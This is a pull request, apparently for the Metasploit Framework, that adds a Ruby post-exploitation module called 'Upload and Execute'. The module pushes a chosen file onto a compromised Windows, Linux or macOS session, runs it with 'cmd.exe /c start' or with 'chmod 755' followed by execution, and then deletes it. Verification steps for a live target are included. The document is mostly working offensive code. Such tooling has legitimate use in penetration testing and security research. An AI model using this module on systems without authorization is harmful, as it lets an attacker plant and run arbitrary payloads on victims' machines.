### PR TITLE
Add a simple upload exec module

### DIFF
--- a/modules/post/multi/manage/upload_exec.rb
+++ b/modules/post/multi/manage/upload_exec.rb
@@ -1,0 +1,52 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Upload and Execute',
+      'Description'   => %q{ Push a file and execute it },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'egypt'],
+      'Platform'      => [ 'win','linux','osx' ],
+      'SessionTypes'  => [ 'meterpreter','shell' ]
+    ))
+
+    register_options(
+      [
+        OptPath.new('LFILE', [true,'Local file to upload and execute']),
+        OptString.new('RFILE', [false,'Name of file on target (default is basename of LFILE)']),
+      ], self.class)
+  end
+
+  def rfile
+    if datastore['RFILE'].blank?
+      remote_name = File.basename(datastore['LFILE'])
+    else
+      remote_name = datastore['RFILE']
+    end
+
+    remote_name
+  end
+
+  def lfile
+    datastore['LFILE']
+  end
+
+  def run
+    upload_file(rfile, lfile)
+
+    if session.platform.include?("windows")
+      cmd_exec("cmd.exe /c start #{rfile}", nil, 0)
+    else
+      cmd_exec("chmod 755 #{rfile} && ./#{rfile}", nil, 0)
+    end
+    rm_f(rfile)
+  end
+
+end
+


### PR DESCRIPTION
This has been sitting in my `.msf4/modules/` for a long time, forgotten and neglected. Someone was asking in IRC today how to do this and I apparently never PR'd it.

## Verification

List the steps needed to make sure this thing works

- [x] Get a shell
- [x] `use post/multi/manage/upload_exec`
- [ ] `set SESSION -1`
- [x] `set LFILE` to a file you want to push and run on target
- [x] `run`
- [x] **Verify** it made it to disk in the session's current directory, named like the basename of LFILE ran
- [x] `set RFILE foo.exe`
- [x] `run`
- [x] **Verify** it's called foo.exe on target and ran successfully

